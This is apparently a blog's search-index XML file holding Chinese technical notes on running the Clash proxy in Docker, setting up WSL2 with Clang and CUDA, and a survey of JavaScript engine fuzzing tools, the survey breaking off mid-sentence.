-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlocal-search.xml
239 lines (113 loc) · 404 KB
/
local-search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>命令行Clash配置</title>
<link href="/2023/03/29/%E5%91%BD%E4%BB%A4%E8%A1%8CClash%E9%85%8D%E7%BD%AE/"/>
<url>/2023/03/29/%E5%91%BD%E4%BB%A4%E8%A1%8CClash%E9%85%8D%E7%BD%AE/</url>
<content type="html"><![CDATA[<h1 id="服务器clash配置"><a href="#服务器clash配置" class="headerlink" title="服务器clash配置"></a>服务器clash配置</h1><h2 id="docker配置"><a href="#docker配置" class="headerlink" title="docker配置"></a>docker配置</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs routeros">docker pull dreamacro/clash<br>docker pull haishanh/yacd<br>docker <span class="hljs-built_in">run</span> -d <span class="hljs-attribute">--name</span>=clash -v <span class="hljs-string">"<span class="hljs-variable">$PWD</span>/config.yaml:/root/.config/clash/config.yaml"</span> -p <span class="hljs-string">"7890:7890"</span> -p <span class="hljs-string">"9090:9090"</span> <span class="hljs-attribute">--restart</span>=unless-stopped dreamacro/clash<br>docker <span class="hljs-built_in">run</span> -p 1234:80 -d --name clash-dashboard haishanh/yacd<br></code></pre></td></tr></table></figure><p>创建docker时使用的配置文件在指定位置,更新时只需要更新docker外的这个文件并重启docker即可。</p><p>yacd是一个网页的clash面板,方便远程配置服务器上的clash。</p><h2 id="clash配置文件"><a href="#clash配置文件" class="headerlink" title="clash配置文件"></a>clash配置文件</h2><p>修改<code>allow-lan</code>参数为true</p><h2 id="docker-clash操作"><a href="#docker-clash操作" class="headerlink" title="docker clash操作"></a>docker clash操作</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#开启</span><br>sudo docker start clash<br>sudo docker start clash-dashboard<br><br><span class="hljs-comment">#关闭</span><br>sudo docker stop clash-dashboard<br>sudo docker stop clash<br><br></code></pre></td></tr></table></figure><h2 id="控制面版"><a href="#控制面版" class="headerlink" title="控制面版"></a>控制面版</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//i</span>p:<span class="hljs-number">1234</span>/<br></code></pre></td></tr></table></figure><p>面板上使用的url,注意结尾不能加<code>/</code></p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//i</span>p:<span class="hljs-number">9090</span><br></code></pre></td></tr></table></figure><p>测试</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl -x http:<span class="hljs-regexp">//</span><span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>:<span class="hljs-number">7890</span> https:<span class="hljs-regexp">//</span>www.google.com.hk/<br></code></pre></td></tr></table></figure><h2 id="全局代理"><a href="#全局代理" class="headerlink" title="全局代理"></a>全局代理</h2><figure class="highlight verilog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs verilog"><span class="hljs-keyword">export</span> http_proxy='http:<span class="hljs-comment">//127.0.0.1:7890'</span><br><span class="hljs-keyword">export</span> https_proxy='http:<span class="hljs-comment">//127.0.0.1:7890'</span><br>git设置代理<br>git <span class="hljs-keyword">config</span> --<span class="hljs-keyword">global</span> http<span class="hljs-variable">.proxy</span> http:<span class="hljs-comment">//127.0.0.1:7890</span><br>git <span class="hljs-keyword">config</span> --<span class="hljs-keyword">global</span> https<span class="hljs-variable">.proxy</span> https:<span class="hljs-comment">//127.0.0.1:7890</span><br>npm设置代理<br>npm <span class="hljs-keyword">config</span> set proxy http:<span class="hljs-comment">//127.0.0.1:7890</span><br>npm <span class="hljs-keyword">config</span> set https-proxy http:<span class="hljs-comment">//127.0.0.1:7890</span><br><br>取消代理<br>unset http_proxy<br>unset https_proxy<br>git <span class="hljs-keyword">config</span> --<span class="hljs-keyword">global</span> --unset http<span class="hljs-variable">.proxy</span> <br>git <span class="hljs-keyword">config</span> --<span class="hljs-keyword">global</span> --unset https<span class="hljs-variable">.proxy</span> <br></code></pre></td></tr></table></figure><h2 id="docker命令"><a href="#docker命令" class="headerlink" title="docker命令"></a>docker命令</h2><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">docker ps [OPTIONS]<br><span class="hljs-comment"># OPTIONS:</span><br><span class="hljs-comment"># -a:显示所有的容器,包括未运行的</span><br><span class="hljs-comment"># -f:根据条件过滤显示的内容</span><br><span class="hljs-comment"># -l:显示最近创建的容器</span><br><span class="hljs-comment"># -n:列出最近创建的n个容器</span><br><span class="hljs-comment"># -q:静默模式,只显示容器ID</span><br><span class="hljs-comment"># -s:显示总的文件大小</span><br><span class="hljs-comment"># --no-trunc:不截断,输出容器详细信息</span><br><br>启动、停止重启:<br>docker start CONTAINER [CONTAINER.<span class="hljs-string">..</span>]<br>docker stop CONTAINER [CONTAINER.<span class="hljs-string">..</span>]<br>docker restart CONTAINER [CONTAINER.<span class="hljs-string">..</span>]<br></code></pre></td></tr></table></figure><h1 id="depot-tools"><a href="#depot-tools" class="headerlink" title="depot_tools"></a>depot_tools</h1><h2 id="使用代理"><a href="#使用代理" class="headerlink" title="使用代理"></a>使用代理</h2><p>创建配置文件/etc/gclient.boto,这个文件是为了让depot_tools使用我们设置的代理参数,必须要配置文件加上路径。</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[Boto]</span><br><span class="hljs-attr">proxy</span> = <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br><span class="hljs-attr">proxy_port</span> = <span class="hljs-number">7890</span><br></code></pre></td></tr></table></figure><p>配置环境变量</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">export</span> <span class="hljs-attribute">http_proxy</span>=<span class="hljs-string">'http://127.0.0.1:7890'</span><br><span class="hljs-built_in">export</span> <span class="hljs-attribute">https_proxy</span>=<span class="hljs-string">'http://127.0.0.1:7890'</span><br><span class="hljs-built_in">export</span> <span class="hljs-attribute">NO_AUTH_BOTO_CONFIG</span>=/etc/gclient.boto<br></code></pre></td></tr></table></figure><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>安装depot_tools,并添加环境变量</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//</span>chromium.googlesource.com<span class="hljs-regexp">/chromium/</span>tools/depot_tools.git<br>export PATH=<span class="hljs-variable">$PATH</span>:[depot_tools文件夹路径]<br></code></pre></td></tr></table></figure><p>使用gclient命令确认是否能正常使用,这个命令会联网检查当前depot_tools的更新。</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">gclient</span><br></code></pre></td></tr></table></figure><h1 id="wsl中使用的快速配置"><a href="#wsl中使用的快速配置" class="headerlink" title="wsl中使用的快速配置"></a>wsl中使用的快速配置</h1><p>保存文件~/.proxyrc</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span><br>host_ip=$(<span class="hljs-built_in">cat</span> /etc/resolv.conf |grep <span class="hljs-string">"nameserver"</span> |<span class="hljs-built_in">cut</span> -f 2 -d <span class="hljs-string">" "</span>)<br><span class="hljs-built_in">export</span> ALL_PROXY=<span class="hljs-string">"http://<span class="hljs-variable">$host_ip</span>:7890"</span><br><span class="hljs-built_in">export</span> http_proxy=<span class="hljs-string">"http://<span class="hljs-variable">$host_ip</span>:7890"</span><br><span class="hljs-built_in">export</span> https_proxy=<span class="hljs-string">"http://<span class="hljs-variable">$host_ip</span>:7890"</span><br>git config --global http.proxy http://<span class="hljs-variable">$host_ip</span>:7890<br>git config --global https.proxy https://<span class="hljs-variable">$host_ip</span>:7890<br><span class="hljs-built_in">export</span> NO_AUTH_BOTO_CONFIG=/etc/gclient.boto<br></code></pre></td></tr></table></figure><p>执行<code>source ~/.proxyrc</code> 配置代理</p>]]></content>
<tags>
<tag>Tool</tag>
</tags>
</entry>
<entry>
<title>WSL2快速部署</title>
<link href="/2023/02/19/WSL2%E5%BF%AB%E9%80%9F%E9%83%A8%E7%BD%B2/"/>
<url>/2023/02/19/WSL2%E5%BF%AB%E9%80%9F%E9%83%A8%E7%BD%B2/</url>
<content type="html"><![CDATA[<h1 id="下载系统"><a href="#下载系统" class="headerlink" title="下载系统"></a>下载系统</h1><figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">wsl</span> <span class="hljs-built_in">--list</span> <span class="hljs-built_in">--online</span><span class="hljs-comment">#可下载系统</span><br><span class="hljs-string">wsl</span> <span class="hljs-built_in">--install</span> -<span class="hljs-string">d</span> (<span class="hljs-string">system</span>)<span class="hljs-comment">#指定下载系统</span><br><span class="hljs-string">wsl</span> -<span class="hljs-string">d</span> (<span class="hljs-string">name</span>)<span class="hljs-comment">#打开系统</span><br><span class="hljs-string">wsl</span> -<span class="hljs-string">t</span> (<span class="hljs-string">name</span>)<span class="hljs-comment">#关闭系统</span><br><span class="hljs-string">wsl</span> <span class="hljs-built_in">--export</span> <span class="hljs-string">Ubuntu-20</span>.<span class="hljs-string">04</span> <span class="hljs-string">D</span>:\<span class="hljs-string">Ubuntu20</span>.<span class="hljs-string">tar</span> <span class="hljs-comment">#导出镜像</span><br><span class="hljs-string">wsl</span> <span class="hljs-built_in">--unregister</span> <span class="hljs-string">Ubuntu-20</span>.<span class="hljs-string">04</span><span class="hljs-comment">#删除系统</span><br></code></pre></td></tr></table></figure><p>如果下载速度慢,使用代理</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">set</span> <span class="hljs-attribute">http_proxy</span>=http://127.0.0.1:7890<br><span class="hljs-built_in">set</span> <span class="hljs-attribute">https_proxy</span>=http://127.0.0.1:7890<br></code></pre></td></tr></table></figure><p>实在不行直接微软商店下载Ubuntu系统</p><h1 id="配置系统"><a href="#配置系统" class="headerlink" title="配置系统"></a>配置系统</h1><p>在想要的位置安装系统</p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gcode">wsl --import Ubu<span class="hljs-symbol">ntu20</span> E:\Systems\Ubu<span class="hljs-symbol">ntu20</span> D:\Systems\Ubu<span class="hljs-symbol">ntu20</span>.tar<br>wsl -d Ubu<span class="hljs-symbol">ntu20</span><br></code></pre></td></tr></table></figure><p>配置登录用户/etc/wsl.conf</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[user]</span><br><span class="hljs-attr">default</span>=azyka<br></code></pre></td></tr></table></figure><p>重启系统</p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gcode">wsl -t Ubu<span class="hljs-symbol">ntu20</span><br>wsl -d Ubu<span class="hljs-symbol">ntu20</span><br></code></pre></td></tr></table></figure><p>换源</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo mv <span class="hljs-regexp">/etc/</span>apt<span class="hljs-regexp">/sources.list /</span>etc<span class="hljs-regexp">/apt/</span>sources.list.bak<br>sudo vi <span class="hljs-regexp">/etc/</span>apt/sources.list<br></code></pre></td></tr></table></figure><p>阿里源</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs awk">deb https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal main restricted universe multiverse<br>deb-src https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal main restricted universe multiverse<br><br>deb https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-security main restricted universe multiverse<br>deb-src https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-security main restricted universe multiverse<br><br>deb https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-updates main restricted universe multiverse<br>deb-src https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-updates main restricted universe multiverse<br><br><span class="hljs-comment"># deb https://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse</span><br><span class="hljs-comment"># deb-src https://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse</span><br><br>deb https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-backports main restricted universe multiverse<br>deb-src https:<span class="hljs-regexp">//mi</span>rrors.aliyun.com<span class="hljs-regexp">/ubuntu/</span> focal-backports main restricted universe multiverse<br></code></pre></td></tr></table></figure><p>更新源</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">sudo apt update</span><br><span class="hljs-attribute">sudo apt upgrade</span><br></code></pre></td></tr></table></figure><h1 id="获取Clang"><a href="#获取Clang" class="headerlink" title="获取Clang"></a>获取Clang</h1><p>更新证书</p><figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sas">wget -O - https://apt.llvm.org/llvm-snapshot.gpg.<span class="hljs-keyword">key</span> | sudo apt-<span class="hljs-keyword">key</span> <span class="hljs-keyword">add</span> -<br></code></pre></td></tr></table></figure><p>添加源<a href="https://apt.llvm.org/">https://apt.llvm.org/</a></p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk">deb http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal main<br>deb-src http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal main<br><span class="hljs-comment"># 14</span><br>deb http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal-<span class="hljs-number">14</span> main<br>deb-src http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal-<span class="hljs-number">14</span> main<br><span class="hljs-comment"># 15</span><br>deb http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal-<span class="hljs-number">15</span> main<br>deb-src http:<span class="hljs-regexp">//</span>apt.llvm.org<span class="hljs-regexp">/focal/</span> llvm-toolchain-focal-<span class="hljs-number">15</span> main<br></code></pre></td></tr></table></figure><p>更新源(需要代理)</p><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">sudo apt update</span><br></code></pre></td></tr></table></figure><p>下载clang-14</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">apt</span>-get install clang-<span class="hljs-number">14</span> lldb-<span class="hljs-number">14</span> lld-<span class="hljs-number">14</span><br></code></pre></td></tr></table></figure><p>可能需要的版本切换</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo update-alternatives --install <span class="hljs-regexp">/usr/</span>bin<span class="hljs-regexp">/clang clang /u</span>sr<span class="hljs-regexp">/bin/</span>clang-<span class="hljs-number">14</span> <span class="hljs-number">1</span> --slave <span class="hljs-regexp">/usr/</span>bin<span class="hljs-regexp">/clang++ clang++ /u</span>sr<span class="hljs-regexp">/bin/</span>clang++-<span class="hljs-number">14</span> <br><br>sudo update-alternatives --install <span class="hljs-regexp">/usr/</span>bin<span class="hljs-regexp">/llvm-config llvm-config /u</span>sr<span class="hljs-regexp">/bin/</span>llvm-config-<span class="hljs-number">14</span> <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><h1 id="安装Anaconda"><a href="#安装Anaconda" class="headerlink" title="安装Anaconda"></a>安装Anaconda</h1><p><a href="https://linuxize.com/post/how-to-install-anaconda-on-ubuntu-20-04/">https://linuxize.com/post/how-to-install-anaconda-on-ubuntu-20-04/</a></p><h1 id="CUDA-in-WSL2"><a href="#CUDA-in-WSL2" class="headerlink" title="CUDA in WSL2"></a>CUDA in WSL2</h1><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo apt-key del <span class="hljs-number">7</span>fa2af80<br>wget https:<span class="hljs-regexp">//</span>developer.download.nvidia.com<span class="hljs-regexp">/compute/</span>cuda<span class="hljs-regexp">/repos/</span>wsl-ubuntu<span class="hljs-regexp">/x86_64/</span>cuda-wsl-ubuntu.pin<br>sudo mv cuda-wsl-ubuntu.pin <span class="hljs-regexp">/etc/</span>apt<span class="hljs-regexp">/preferences.d/</span>cuda-repository-pin-<span class="hljs-number">600</span><br>wget https:<span class="hljs-regexp">//</span>developer.download.nvidia.com<span class="hljs-regexp">/compute/</span>cuda<span class="hljs-regexp">/12.0.0/</span>local_installers/cuda-repo-wsl-ubuntu-<span class="hljs-number">12</span>-<span class="hljs-number">0</span>-local_12.<span class="hljs-number">0.0</span>-<span class="hljs-number">1</span>_amd64.deb<br>sudo dpkg -i cuda-repo-wsl-ubuntu-<span class="hljs-number">12</span>-<span class="hljs-number">0</span>-local_12.<span class="hljs-number">0.0</span>-<span class="hljs-number">1</span>_amd64.deb<br>sudo cp <span class="hljs-regexp">/var/</span>cuda-repo-wsl-ubuntu-<span class="hljs-number">12</span>-<span class="hljs-number">0</span>-local<span class="hljs-regexp">/cuda-*-keyring.gpg /u</span>sr<span class="hljs-regexp">/share/</span>keyrings/<br>sudo apt-get update<br>sudo apt-get -y install cuda<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>Tool</tag>
</tags>
</entry>
<entry>
<title>Javascript引擎模糊测试调研</title>
<link href="/2022/09/30/Javascript%E5%BC%95%E6%93%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E8%B0%83%E7%A0%94/"/>
<url>/2022/09/30/Javascript%E5%BC%95%E6%93%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E8%B0%83%E7%A0%94/</url>
<content type="html"><![CDATA[<h1 id="JS引擎常识"><a href="#JS引擎常识" class="headerlink" title="JS引擎常识"></a>JS引擎常识</h1><h2 id="基本结构"><a href="#基本结构" class="headerlink" title="基本结构"></a>基本结构</h2><ul><li>parser解析器:将源码转为AST</li><li>interpreter:将AST转为字节码</li><li>JIT编译器:优化字节码</li><li>运行环境:支持interpreter运行</li></ul><p>其中parser和interpreter逻辑简单,近期少有在其中发现bug的报告</p><p>JIT又根据js引擎、下层IR、优化技术等不同有不同的实现方式</p><h2 id="编译流程"><a href="#编译流程" class="headerlink" title="编译流程"></a>编译流程</h2><p>通常情况下,JS引擎处理输入文件分为以下2阶段:</p><ol><li>code validity check<ul><li>syntax analysis语法分析——解析得到AST</li><li>semantic analysis语义分析</li></ul></li><li>code interpreting execution<ul><li>pre-parsing预解析</li><li>运行(未被优化的字节码会在代码被编译前运行,以求保证实际处理效率)</li></ul></li></ol><h2 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h2><p>JS引擎中包含的漏洞类型:</p><ul><li>overflow</li><li>UAF</li><li>race condition</li><li>type confusion</li></ul><h2 id="challenge"><a href="#challenge" class="headerlink" title="challenge"></a>challenge</h2><ol><li><p>Test-Case Validity Check</p><p>代码错误会终止整个代码的运行,将时间消耗在parsing阶段且没有实际运行,降低了fuzz效率</p></li><li><p>Code Coverage Enhancement</p><p>衡量fuzzing工具的重要标准</p><p>由于js引擎的代码量极大,测试用例往往只会覆盖到有限的执行路径,如何提高代码覆盖率是一个重要的挑战。</p></li></ol><h1 id="JS-fuzz方法"><a href="#JS-fuzz方法" class="headerlink" title="JS fuzz方法"></a>JS fuzz方法</h1><h2 id="生成式"><a href="#生成式" class="headerlink" title="生成式"></a>生成式</h2><p>问题——如何自动生成具有丰富代码样式的测试用例且遵循JS语法</p><p>fuzzer</p><ul><li><p>Peach</p><p>需要手动构建测试用例样本,生成样本的错误率高</p></li><li><p>JSfunfuzz——引入grammar-based</p><p>可以自动生成随机且语法正确的测试用例</p><p>需要花费大量时间构建语法规则样本</p></li><li><p>TreeFuzz、Skyfire</p><p>引入概率模型,从现有样本提取语法特征和规则来生成测试用例</p><p>使用data-driven test case generation</p></li><li><p>CodeAlchemist——引入semantics-aware</p><p>首次使用AST实现初始种子片段化,经过去重、变量归一化等预处理措施后,根据控制流和数据流分析获取变量定义,然后结合代码插桩识别变量类型。最后,组装匹配约束的代码片段以生成语义正确的 JS 测试用例</p></li><li><p>Montage ——引入神经网络语言模型</p><p>使用fragment概念作为基本单元</p><p>fragment:将AST转为多个深度为1的子树,每个内部节点都会产生一个单元子树,称这样的子树为fragment</p><p>数据集:<a href="https://github.com/tc39/test262">https://github.com/tc39/test262</a></p><p>NEUZZ 同样是深度学习fuzzer</p></li><li><p>Comfort——使用advanced Transformer-based GPT-2模型替代NNLM</p></li></ul><h2 id="变异式"><a href="#变异式" class="headerlink" title="变异式"></a>变异式</h2><p>js严格的输入检查使基于字节进行随机变异的fuzzer效果很差,因此变异式fuzzing需要关注js语法结构和变异程度</p><ul><li><p>Superion——灰盒</p><p>在js AST层面基于AFL和ANTLR变异</p><p>使用语法感知的修检策略直接在AST层面减少测试输入</p><p>使用子树替代实现种子变异</p></li><li><p>Deity</p><p>从1-day exp样本提取特征模板,使用分析工具Esprima实现AST层面的修建和变异操作</p></li><li><p>SaFuzzer</p><p>结合语义修复机制来解决句法有效但语义无效的问题,同样在AST层面</p></li><li><p>Fuzzilli</p><p>引入自定义的IR——FuzzIL,与实际js引擎执行的字节码更接近,IR层面变异后转化为JS代码,这种方式有效继承了初始输入的控制流和数据流属性,保持了测试用例的语义合法性。但Fuzzilli忽略了路径覆盖率信息。</p></li></ul><h2 id="混合式"><a href="#混合式" class="headerlink" title="混合式"></a>混合式</h2><p>生成式因输入空间大而导致效率较低,变异式难以保证测试用例语义正确性,混合式通过结合这两种方式平衡合法性和效率问题</p><ul><li><p>LangFuzz——最早的混合式</p><p>引入code-fragmentation,将合法JS代码解析成AST,从中提取代码片段并存储到片段池,通过片段替换生成新测试用例</p><p>生成:广度优先策略替换非终端AST节点</p><p>变异:随机替换同级节点</p></li><li><p>GramFuzz </p><p>生成:使用深度优先策略</p><p>变异:使用删除、修改、复制等多种变异操作</p></li><li><p>IFuzzer </p><p>遗传算法选择、交叉、变异JS样本,增加测试用例生成模式</p><p><strong>上面3个fuzzer都是context-free grammar,代码块的变异都属于AST层面,且都是没有使用反馈机制的黑盒模型</strong></p></li><li><p>Nautilus ——灰盒</p><p>增加插桩和覆盖率反馈,方法和AFL相似</p><p>生成和变异都基于AST,根据反馈信息从5中变异方式中选择合适的变异方法。</p></li><li><p>DIE ——2021年为止最佳fuzzer</p><p>Aspect-Preserving 变异,保持特殊结构和类型信息,避免了代码块可能导致的逻辑结构和原始语义破坏问题。基于高质量JS样本生成初始语料库,使用结构和类型保持的编译算法生成新测试用例。</p><p>定义了Aspect的概念,即很可能触发问题的元素,尽可能地保持影响控制流和数据依赖的重要代码结构。</p><p>大大提升了测试用例地合法性和定位深层bug(JIT优化过程中的缺陷)能力</p><p>利用反馈机制有效缩减了样本空间,减少无效变异</p></li></ul><h1 id="fuzzing框架"><a href="#fuzzing框架" class="headerlink" title="fuzzing框架"></a>fuzzing框架</h1><h2 id="初始语料库构建"><a href="#初始语料库构建" class="headerlink" title="初始语料库构建"></a>初始语料库构建</h2><ul><li>手写</li><li>爬虫</li><li>POC和test suites</li><li>官方测试数据集</li></ul><p>主流——将测试用例转为AST</p><p>DIE——将测试用例转为Typed-AST</p><p>Montage——深度学习官方ECMA test suites</p><h2 id="Effectiveness-amp-Efficiency-平衡"><a href="#Effectiveness-amp-Efficiency-平衡" class="headerlink" title="Effectiveness & Efficiency 平衡"></a>Effectiveness & Efficiency 平衡</h2><p>生成式关注测试用例合法性</p><p>变异式关注效率</p><h2 id="运行时反馈"><a href="#运行时反馈" class="headerlink" title="运行时反馈"></a>运行时反馈</h2><p>开源</p><ul><li>插桩</li></ul><p>闭源</p><ul><li>AFL-qemu</li><li>二进制动态插桩</li><li>Intel-PT mechanism</li></ul><h1 id="发展"><a href="#发展" class="headerlink" title="发展"></a>发展</h1><p>问题</p><ul><li><p>如何定位快速精准定位JS bug位置,并根据威胁程度进行patch</p></li><li><p>如何构建并运行高质量的测试用例</p><ul><li><p>主流:根据预定义的模型和策略在AST层面进行生成和变异</p><p>限制:</p><ul><li>难以发现深层漏洞,JS中漏洞从简单的解析和内存问题逐渐发展到深层逻辑优化漏洞,触发条件更苛刻,对测试用例有效性和执行路径深度提出高要求</li><li>巨大的代码规模要求巨大的fuzzing搜索空间,对fuzzer的运行机制和硬件设备开销提出了更高的要求</li></ul></li></ul></li></ul><p>新发展方向</p><ul><li>结合深度学习——参考NEUZZ </li><li>直接fuzz JIT编译器——初步探索 JITFuzz </li><li>部署高性能计算机,提高硬件执行容量</li></ul><h2 id="2022最新论文"><a href="#2022最新论文" class="headerlink" title="2022最新论文"></a>2022最新论文</h2><ul><li><p>Jit-Picking Differential Fuzzing of JavaScript Engines</p></li><li><p>KOP-Fuzzer A Key-Operation-based Fuzzer for Type Confusion Bugs in JavaScript Engines</p></li></ul><h1 id="CodeAlchemist"><a href="#CodeAlchemist" class="headerlink" title="CodeAlchemist"></a>CodeAlchemist</h1><ul><li><p>semantics-aware assembly</p><p>将 JS 种子分割成一组可组合的构建块(基于AST),我们称之为code bricks。代码块代表有效的 JS 抽象语法树 (AST)。因此,代码块本身可以由 JS 引擎评估。例如,一个 JS 语句可以变成code 